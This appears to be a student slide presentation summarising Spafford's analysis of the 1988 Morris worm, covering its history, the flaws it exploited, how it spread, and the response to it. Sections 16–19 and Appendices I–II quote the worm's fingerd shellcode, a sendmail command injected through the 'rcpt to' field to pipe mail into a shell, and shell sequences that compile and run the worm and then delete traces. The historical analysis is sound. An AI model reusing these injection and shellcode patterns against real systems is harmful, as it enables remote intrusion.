Crisis and Aftermath Eugene H. Spafford


1 Crisis and Aftermath Eugene H. Spafford
Timo Strauch & Sebastian Poth

2 Paper Presentation – Distributed Information Processing
Agenda
1 History
2 Foundations
  - Worm vs. Virus
  - Flaws of the Systems: Finger(d), Sendmail, Passwords, Trusted Logins
3 Functionality of the Morris Worm
  - High-Level Description
  - Detailed Functionalities
4 Aftermath


4 History
Timeline:
- 5 p.m., Nov. 2, 1988: A program was executed on one or more hosts connected to the internet
  - Collected host, network and user information and used them to break into other machines
  - Only two types of machines: Sun Microsystems Sun 3 systems and VAX computers with versions of 4BSD UNIX
  - Machines became more and more loaded with repeated infection
  - Some of the machines were unable to continue any processing
- Early morning, Nov. 3, 1988: First “captures” of the program and analysis by the University of California at Berkeley and MIT
  - Analyze the code and discover who unleashed it
- 5 a.m., Nov. 3, 1988: Computer Systems Research Group at Berkeley had developed a set of steps to halt its spread
- 9 p.m., Nov. 3, 1988: Another simple, effective method of stopping the invading program
  - Berkeley group provided patches to mend all the flaws

November 2, 1988, sometime after 5 p.m.: a program was executed on one or more hosts connected to the internet
- Program collected host, network and user data
- Using flaws present in those systems' software to break into other machines
- Sun Microsystems Sun 3 systems and VAX computers running variants of 4 BSD UNIX
- Unusual files in /usr/tmp
- Strange messages appeared in log files of some of the utilities, such as the sendmail handling agent
- Systems became more and more loaded with running processes
- Became so loaded that they were unable to continue any processing
November 3, 1988, 5 a.m.: Personnel of University of California and MIT captured first copies of the program and began to analyze it
- After 12 hours the Computer Systems Research Group had developed an interim set of steps to halt its spread and published it through mailing lists and Usenet
November 3, 1988, 9 p.m.: Another simple, effective method of stopping the invading program without altering system utilities
- At the same time the Berkeley group provided patches to mend all the flaws
Following weeks: Other well-publicized computer break-ins occurred


6 Worm vs. Virus
Independence in running? Worm: yes. Virus: no.
How does it spread? Worm: can use a network to replicate itself. Virus: relies on users transferring infected files/programs.
When invoked? Worm: itself. Virus: when infected program is running.
Target: Worm: several systems. Virus: target machine.
Not in the paper, see [1]

7 Flaws of the Systems: Finger(d)
- Allows users to obtain information (full name, login name, …) about other users
- Runs as a daemon to service remote requests (fingerd)
- Flaw only works on VAX machines, not on Suns
- Overrunning buffer: the gets call takes input to a buffer without checking any bounds
- Rewrite stack frame: overflow resulted in the return stack frame for the main routine being changed
- Altering behavior of program: execute specific code instead

The finger program is a utility that allows users to obtain information about other users. It is usually used to identify the full name or login name of a user, whether or not a user is currently logged in, and possibly other information about the person such as telephone numbers where he or she can be reached. The fingerd program is intended to run as a daemon, or background process, to service remote requests using the finger protocol [5]. This daemon program accepts connections from remote programs, reads a single line of input, and then sends back output matching the received request.

Bug: overflow of the buffer the daemon used for input. It reads input without checking any bounds, so the input overran the buffer allocated for it and rewrote the stack frame.

As will be explained later, the input overran the buffer allocated for it and rewrote the stack frame thus altering the behavior of the program. A connection was established to the remote finger server daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack. For standard 4BSD versions running on VAX computers, the overflow resulted in the return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack. That is, the code executed when the main routine attempted to return was: execve(“/bin/sh”, 0, 0)
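The bounds check that the fingerd input path lacked, as an added example (not code from the paper or from fingerd): a line reader that never stores more than the buffer holds and rejects an overlong request such as the 536-byte string. The names REQ_MAX, read_request and feed, and the 128-byte limit, are assumptions made for this sketch; the sample requests are constructed.

```c
#include <stdio.h>
#include <string.h>

#define REQ_MAX 128   /* assumed request limit for this sketch */

enum req_status { REQ_OK = 0, REQ_TOO_LONG = -1, REQ_EOF = -2 };

/*
 * Read one request line from `in` into buf (capacity `cap` bytes).
 * The flawed pattern the slide describes is an unbounded read, e.g.
 *     char line[512]; gets(line);
 * where the sender, not the daemon, decides how many bytes land on the stack.
 * Here fgets() never stores more than cap-1 bytes plus the terminator, and an
 * overlong line is drained and rejected instead of being truncated and served.
 */
enum req_status read_request(FILE *in, char *buf, size_t cap)
{
    if (cap < 2)
        return REQ_TOO_LONG;
    if (fgets(buf, (int)cap, in) == NULL) {
        buf[0] = '\0';
        return REQ_EOF;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                 /* complete line, strip newline */
    } else {
        int c = fgetc(in);               /* did the line end exactly here? */
        if (c != '\n' && c != EOF) {
            while (c != '\n' && c != EOF)
                c = fgetc(in);           /* discard the rest of the line */
            buf[0] = '\0';
            return REQ_TOO_LONG;
        }
    }
    if (n > 0 && buf[n - 1] == '\r')
        buf[--n] = '\0';                 /* network line endings are CR LF */
    return REQ_OK;
}

/* Test helper: pass `len` constructed bytes plus a newline through
 * read_request() by way of a temporary file standing in for the socket. */
enum req_status feed(const char *data, size_t len, char *out, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return REQ_EOF;
    fwrite(data, 1, len, f);
    fputc('\n', f);
    rewind(f);
    enum req_status st = read_request(f, out, cap);
    fclose(f);
    return st;
}

/* Returns 1 if a 536-byte request is rejected and the bytes placed directly
 * after the request buffer are untouched. */
int oversized_request_is_contained(void)
{
    struct { char buf[REQ_MAX]; unsigned char guard[16]; } frame;
    char big[536];                       /* constructed filler, length from the slide */
    memset(big, 'A', sizeof big);
    memset(frame.guard, 0x5a, sizeof frame.guard);
    enum req_status st = feed(big, sizeof big, frame.buf, sizeof frame.buf);
    for (size_t i = 0; i < sizeof frame.guard; i++)
        if (frame.guard[i] != 0x5a)
            return 0;
    return st == REQ_TOO_LONG && frame.buf[0] == '\0';
}

int main(void)
{
    char req[REQ_MAX];
    printf("normal request: %d\n", feed("spaf", 4, req, sizeof req));
    printf("536-byte request contained: %d\n", oversized_request_is_contained());
    return 0;
}
```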

8 Flaws of the Systems: Sendmail
- Mailer designed to route mail in a heterogeneous inter-network
- Runs in various modes, but the worm exploited the daemon mode in combination with the debug mode:
  - Sendmail is listening on port #25 for attempts to deliver mail using SMTP
  - Worm contacted port #25 of the victim machine
  - Issued the DEBUG functionality
  - Specified a set of commands instead of a user address
- DEBUG mode was often used and often left turned on by vendors and administrators

9 Flaws of the Systems: Passwords
- Key attack of the worm involved attempts to discover user passwords
- Encrypted password of each user was in a publicly readable file (permuted version of the DES)
- Encrypt possible passwords
- Compare against the actual password without any system calls
- Try common words/combinations until a match is found
- Using password lists and dividing task among multiple processors
- Some sites reported that over 50 percent of their passwords were quickly broken by this simple approach
- Worm exploited accessibility of password file coupled with the tendency of users to choose common words as passwords

The password is encrypted using a permuted version of the Data Encryption Standard (DES) algorithm, and the result is compared against a previously encrypted version present in a world-readable accounting file. If a match occurs, access is allowed. No plaintext passwords are contained in the file, and the algorithm is supposedly noninvertible without knowledge of the password. The organization of the passwords in UNIX allows nonprivileged commands to make use of information stored in the accounts file, including authentication schemes using user passwords. However, it also allows an attacker to encrypt lists of possible passwords and then compare them against the actual passwords without calling any system function. In effect, the security of the passwords is provided by the prohibitive effort of trying this approach with all combinations of letters. Unfortunately, as machines get faster, the cost of such attempts decreases. Dividing the task among multiple processors further reduces the time needed to decrypt a password. Such attacks are also made easier when users choose obvious or common words for their passwords. An attacker need only try lists of common words until a match is found.

The worm used such an attack to break passwords. It used lists of words, including the standard online dictionary, as potential passwords. It encrypted them using a fast version of the password algorithm and then compared the result against the contents of the system file. The worm exploited the accessibility of the file coupled with the tendency of users to choose common words as their passwords.

10 Flaws of the Systems: Trusted Logins
- A feature of BSD UNIX-based networking code is the ability to execute tasks on remote machines
- List of host/login pairs that are assumed to be “trusted”, in the sense that a remote access is never asked for a password
- Worm examined files that listed machine/logins used by the host
- Often, machines and accounts are reconfigured for reciprocal trust
[Diagram: remote machines (Victim/User1) and trusted machines (Server/User1), with User1 and User2]

A related flaw exploited by the worm involved the use of trusted logins. One of the most useful features of BSD UNIX-based networking code is the ability to execute tasks on remote machines. To avoid having to repeatedly type passwords to access remote accounts, it is possible for a user to specify a list of host/login name pairs that are assumed to be “trusted,” in the sense that a remote access from that host/login pair is never asked for a password. This feature has often been responsible for users gaining unauthorized access to machines (cf. [11]), but it continues to be used because of its great convenience. The worm exploited the mechanism by locating machines that might “trust” the current machine/login being used by the worm. This was done by examining files that listed remote machine/logins used by the host. Often, machines and accounts are reconfigured for reciprocal trust.


12 Morris Worm: High-Level Description
Main Program
- Two versions: Sun 3 and VAX
- Collect information about users and possible victims
  - Read public configuration files and run system utility programs
  - Save this information
- Use the described flaws to spread itself across the network by transferring the vector program
Vector Program
- Small program (99 lines in C)
- Transferred and invoked on the victim machine
- Transfers the main program to the new victim
- Different names: vector or grappling hook program, L1.c program

13 Morris Worm: High-Level Description
Current situation: Infection of a server is completed and main program starts working
1. Gather information about network interfaces (incl. reachability tests)
   List of Target Machines: Host A
2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail
3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data
   User/Password/Hosts: User1/abc/Host A, Host B

14 Morris Worm: High-Level Description
Current situation: Infection of a server is completed and main program starts working
1. Gather information about network interfaces (incl. reachability tests)
   List of Target Machines: Host A
2. Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail
3. Collect information about users and hosts, try to break password, try to connect to Victims with login-data
   User/Password/Hosts: User1/abc/Host A, Host B
4. Transfer and execute vector program, which re-connects to server and transfers the main program
5. Main-Program Features and Survival

15 Morris Worm: Gather Information
Step 1: Gather information about network interfaces (incl. reachability tests)
- Gather information about network interfaces
  - Local “ioctl” and “netstat” calls with various arguments
  - Add information about possible hosts into worm’s database
- Reachability tests by telnet and rexec
  - Based on list of directly connected hosts
Result: List of Target Machines (Host A)

16 Morris Worm: Infection attempts
Step 2: Infection attempts: (1.) RSH, (2.) Finger, (3.) Sendmail
Main Goal: Open Remote Shell or directly transfer Vector Program
- Directly use RSH (Remote Shell)
- Finger daemon (only on VAXs; on Suns it caused a core dump)
  - Connect to remote daemon and pass 536-byte string
  - Overflowing its input buffer and overwriting parts of the stack
  - Return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack
  - Remotely executes execve(“/bin/sh”, 0, 0), which opens a remote shell
- Sendmail
  - Get into a dialog with the sendmail daemon (port #25)
  - DEBUG mode
  - Execute commands via the user address field (“rcpt to”)
  - Vector program in the data part of the mail
  - Local shell on victim machine creates, compiles and executes vector program
As soon as one method succeeded, the host entry in the internal list was marked as “infected”

17 Morris Worm: 5 State Machine
Step 3: Collect information about users and hosts, try to break password, try to connect to Victims with login-data
Collect information about users and hosts
- Files to find hosts: /etc/hosts.equiv, .forward file
- File to find users/passwords: /etc/passwd
  Account:abskjdhfksf:100:5:User, Name:/usr/account:/bin/sh
  Field labels: accountname, password, UserID, GroupID, UserInfo, Home account
Break passwords:
- By using simple choice based on:
- By using an internal dictionary (432 words)
- By using the UNIX online dictionary
  - File: /usr/dict/words

18 Morris Worm: 5 State Machine
Step 3: Collect information about users and hosts, try to break password, try to connect to Victims with login-data
Once a password is broken (“Infinite State 5”):
- Break into remote machines where that user had accounts:
  - Scan files: .forward and .rhosts
- Remote shell by the rexec remote command execution service
  - Authentication with username/password is possible, because users often have the same password on their accounts on multiple machines
- Use local authentication
  - Rexec to local host (authentication with local username/password)
  - RSH to the remote machine (authentication with username)
  - Success if the remote machine had a hosts.equiv file or the user had a .rhosts file that allows remote execution without a password

19 Morris Worm: Vector Program
Step 4: Transfer and execute vector program, which re-connects to server and transfers the main program
Based on the infection attempt that was successful, the code of the vector program is copied, compiled and executed:

Remote shell established:
  PATH=/bin:/usr/bin:/usr/ucb
  cd /usr/tmp
  echo gorch49; sed '/int zz/q' > x O.c; echo gorch50
  [text of vector program]
  int zz;
  cc -o z x c; ./x ; rm -f x x O.c; echo DONE

Connection to sendmail daemon established:
  debug
  mail from: (/dev/null)
  rcpt to: ("|sed -e '1,/^$/'d | /bin/sh; exit 0")
  data
  cd /usr/tmp
  cat > x c << 'EOF'
  EOF
  cc -o x x c; rm -f x x c
  quit

20 Morris Worm: Vector Program
Step 4: Transfer and execute vector program, which re-connects to server and transfers the main program
- Vector program connects to the host machine on the specified port, authenticated with a magic number
  - Magic number acted as a one-time challenge password
  - Worm on the host machine waits up to 2 min for a response
- Connection established, then transferring 3 files:
  - Sun 3 binary version of the worm
  - VAX version of the worm
  - Source code of the vector program
- Vector program becomes a shell (via execl call)

21 Morris Worm: Main-Program Initiation
Step 5: Main-Program Instantiation and “hiding itself”
- For each object file, the worm tries to build an executable object
  - Sun 3 binary version of the worm
  - VAX version of the worm
- If one of the files executed successfully, the worm closes the connection to the victim
- Otherwise it clears away all evidence of the attempt at infection
Victim machine is infected!

22 Morris Worm: Main-Program Features
Step 5: Main-Program Instantiation and “hiding itself”
- Check if there is any other instance of the worm running on this machine
  - Connecting to a local, predetermined TCP socket
  - If the connection succeeded, one of the worms (randomly) set its “pleasequit” variable to 1
  - The worm exits after breaking user passwords with its own dictionary (not immediately, delay of exit)
- “Self-Check” failed when server load is too high
  - Often multiple versions of the worm running on the same machine

In parallel to the other procedures, the worm checks whether there is any other instance of the worm running on this machine by connecting to a local, predetermined TCP socket. If the connection succeeded, one of the worms (randomly) set its “pleasequit” variable to 1, causing the worm to exit after breaking user passwords with its own dictionary (not immediately!). The “self-test” failed when server load was too high, so there were often multiple versions of the worm running on the same machine.

23 Morris Worm: Main-Program Survival
Step 5: Main-Program Instantiation and “hiding itself”
- After successful infection: read all binary files into memory and delete all files on the disk
- “Self-Check” enables a simple counter attack: fake worm on the TCP port
  - 1 out of 7 worms would become immortal, even if there were other instances running
  - Many machines were overloaded with copies of the worm
- The worm would periodically fork itself and kill its parent process
  - Scheduler would lower priorities of long-running processes, thus by forking itself it would retain normal scheduling priority
  - Keeps changing its process identifier, thus one could not observe one process accumulating massive amounts of CPU time
- Every 12 hours: flush internal tables and re-infect the same machine

The new worm on the infected host proceeded to “hide” itself by obscuring its argument vector, unlinking the binary version of itself, and killing its parent (the $$ argument in the invocation). It then read into memory each of the worm binary files, encrypted each file after reading it, and deleted the files from disk.


25 Aftermath – Damage
- Morris worm was the first computer worm
- Around 6000 major UNIX machines were infected (10% of the network at that time)
- Important nation-wide gateways were shut down
- No code present in the worm that would explicitly damage any system, and no mechanism to stop
- “Offensive” functionality: send every 15 infections an uninitialized byte message to ernie.berkeley.edu
  - The code was incorrect and never transferred any data
  - Speculations: monitoring process, or he simply wanted to cast suspicion on Berkeley

26 Aftermath – Who and Why?
Primary Questions: Who and Why?
- Robert T. Morris (graduate student at Cornell University)
- No statement from Morris, only speculations:
  - Revenge against his father
  - Impress people
  - Prank
  - Experiment gone awry
  - Not in the paper: “…to figure out how big the Internet was…” [2]
Consequences:
- Topic debated: Punishment?
- Not in the paper: 400h of community service & $10,000 [2]

Coupled with this tendency to assume motive, we have observed very different opinions on the punishment, if any, to mete out to the author. One oft-expressed opinion, especially by those individuals who believe the worm release was an accident or an unfortunate experiment, is that the author should not be punished. Some have gone so far as to say that the author should be rewarded and the vendors and operators of the affected machines should be the ones punished, this on the theory that they were sloppy about their security and somehow invited the abuse! The other extreme school of thought holds that the author should be severely punished, including a term in a federal penitentiary. (One somewhat humorous example of this point of view was espoused by syndicated columnist Mike Royko [IQ].)

27 Aftermath - CERT
- NCSC post-mortem workshop: Recommendation: formal crisis center
- After another attack: CERT (Computer Emergency Response Team) was established
  - Purpose: to act as a central switchboard and coordinator for computer security emergencies on Arpanet and MILnet computers
  - Not the whole “internet” (CSnet, Bitnet, NSFnet, and other internet communities)

A significant conclusion reached at the NCSC postmortem workshop was that the reason the worm was stopped so quickly was due almost solely to the UNIX “old-boy” network, and not due to any formal mechanism in place at the time [10]. A recommendation from that workshop was that a formal crisis center be established to deal with future incidents and to provide a formal point of contact for individuals wishing to report problems. No such center was established at that time.

28 Aftermath – Fix the Problem
- Both the Internet and UNIX helped to defeat the worm as well as spread it
  - Communication and ability to copy source and binary files
- Fixing the problem not only means fixing the flaws - it…
  - …should point out that we need a better mechanism in place to coordinate information about security flaws and attacks
  - …should prompt us to think about the ethics and laws concerning access to computers

Further, such an attitude would be contrary to the whole purpose of having an open, research-oriented network. The worm was caused by a breakdown of ethics as well as lapses in security; a purely technological attempt at prevention will not address the full problem, and may just cause new difficulties.

The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it. Many site administrators discovered the problem from reading newspapers or watching television. The major sources of information for many of the sites affected seems to have been Usenet news groups and a mailing list I put together when the worm was first discovered. Although useful, these methods did not ensure timely, widespread dissemination of useful information, especially since they depended on the Internet to work!

29 Thank You!
Timo Strauch & Sebastian Poth

30 Literature
[1] differences.html
[2]

31 Appendix I – Call of the Main Program
The server worm sent the following command stream to the connected shell:
  PATH=/bin:/usr/bin:/usr/ucb
  rm -f sh
  if [ -f sh ]
  then
  P=x
  else
  P=sh
  fi
Then it would send the following form of command sequence:
  cc -o $P x ,sun3.o
  ./$P -p $$ x ,sun3.o x ,vax.o x ,11.c
  rm -f $P
- “rm” succeeds only if the linked version of the worm failed to start execution
- If the server determined that the host was now infected, it closed the connection. Otherwise, it would try the other binary file.
- After both binary files had been tried, it would send over “rm” commands for the object files to clear away all evidence of the attempt at infection

The server worm sent the following command stream to the connected shell: PATH… Then, for each binary file it had transferred (just two in this case although the code is written to allow more), it would send the following form of command sequence: cc…. The rm would succeed only if the linked version of the worm failed to start execution. If the server determined that the host was now infected, it closed the connection. Otherwise, it would try the other binary file. After both binary files had been tried, it would send over rm commands for the object files to clear away all evidence of the attempt at infection.

32 Appendix II – Details of Fingerd Flaw
The instructions that were written into the stack at that location were:
  pushl $68732f    ‘/sh\0’
  pushl $6e69622f  ‘/bin’
  movl sp, r10
  pushl $0
  pushl r10
  pushl $3
  movl sp, ap
  chmk $3b
CHMK – Change mode to Kernel
That is, the code executed when the main routine attempted to return was:
  execve(“/bin/sh”, 0, 0)
On VAXs, this resulted in the worm being connected to a remote shell via the TCP connection

33 Appendix III – Fix the Flaws
Finger
- Program audits by various individuals have revealed other potential problems, and many patches have been circulated since November to deal with these flaws
Sendmail
- Other flaws have been found and reported now that attention has been focused on the program, but it is not known for sure if all the bugs have been discovered and all the patches circulated
Password
- Shadow password file: encrypted passwords are saved in a file (shadow) that is readable only by the system administrators, and a privileged call performs password encryptions and comparisons with an appropriate timed delay (0.5 to 1 second, for instance)
- Change the utility that sets user passwords: nontrivial passwords (restrictions)
Trusted Logins
- Current remote access mechanism should be removed and possibly replaced with something else
- Kerberos authentication servers: this scheme uses dynamic session keys that need to be updated periodically
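A check for the shadow-password fix listed above, as an added example (not from the paper or the presentation): it classifies the password field of each passwd-format line, using the colon-separated layout shown on slide 17, and counts accounts whose hash is still stored in the world-readable file. The function names and the sample file are constructed for this sketch; treating "x" as shadowed and "*" or "!" as locked follows common UNIX convention and is an assumption here, and flagging empty password fields goes beyond what the slides mention.

```c
#include <stdio.h>
#include <string.h>

enum pw_finding { PW_SHADOWED, PW_LOCKED, PW_EMPTY, PW_HASH_EXPOSED, PW_MALFORMED };

/* Classify one passwd-format line (7 colon-separated fields, no newline).
 * The account name is copied into `user` (truncated to user_cap-1 bytes). */
enum pw_finding classify_passwd_line(const char *line, char *user, size_t user_cap)
{
    size_t colons = 0;
    for (const char *p = line; *p; p++)
        if (*p == ':')
            colons++;
    const char *c1 = strchr(line, ':');
    if (user_cap == 0)
        return PW_MALFORMED;
    if (colons != 6 || c1 == line) {         /* wrong field count or empty name */
        user[0] = '\0';
        return PW_MALFORMED;
    }
    size_t ulen = (size_t)(c1 - line);
    if (ulen >= user_cap)
        ulen = user_cap - 1;
    memcpy(user, line, ulen);
    user[ulen] = '\0';

    const char *pw = c1 + 1;                 /* second field: password */
    size_t plen = strcspn(pw, ":");
    if (plen == 0)
        return PW_EMPTY;                     /* login without any password */
    if (plen == 1 && pw[0] == 'x')
        return PW_SHADOWED;                  /* hash lives in the protected file */
    if (pw[0] == '*' || pw[0] == '!')
        return PW_LOCKED;                    /* no valid hash, login disabled */
    return PW_HASH_EXPOSED;                  /* hash readable by every local user */
}

/* Count accounts in a passwd-format text that need attention:
 * exposed hashes and empty passwords. Overlong lines are skipped. */
size_t count_exposed(const char *text)
{
    size_t exposed = 0;
    char user[32];
    char line[256];
    while (*text) {
        size_t len = strcspn(text, "\n");
        if (len > 0 && len < sizeof line) {
            memcpy(line, text, len);
            line[len] = '\0';
            enum pw_finding f = classify_passwd_line(line, user, sizeof user);
            if (f == PW_HASH_EXPOSED || f == PW_EMPTY) {
                printf("review account: %s\n", user);
                exposed++;
            }
        }
        text += len;
        if (*text == '\n')
            text++;
    }
    return exposed;
}

/* Constructed sample; the second line is the example entry from slide 17. */
static const char SAMPLE_PASSWD[] =
    "root:x:0:0:root:/root:/bin/sh\n"
    "Account:abskjdhfksf:100:5:User, Name:/usr/account:/bin/sh\n"
    "daemon:*:1:1:daemon:/:/sbin/nologin\n"
    "guest::200:5:Guest:/usr/guest:/bin/sh\n"
    "broken:line\n";

int main(void)
{
    printf("accounts to review: %zu\n", count_exposed(SAMPLE_PASSWD));
    return 0;
}
```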

34 Appendix IV – Conclusion (Cont'd)
- Increasing the obstacles to open communication or decreasing the number of people with access to in-depth information will not prevent a determined hacker
  - It will only decrease the pool of expertise and resources available to fight such an attack
- Purely technological attempt at prevention will not address the full problem
- This attack should also point out that we need a better mechanism in place to coordinate information about security flaws and attacks
  - The formation of the CERT may be a step in the right direction, but a more general solution is still needed
- The response to this incident was largely ad hoc, and resulted in both duplication of effort and a failure to disseminate valuable information to sites that needed it
  - Many site administrators discovered the problem from reading newspapers or watching television
  - The major sources of information for many of the sites affected seems to have been Usenet news groups and mailing lists

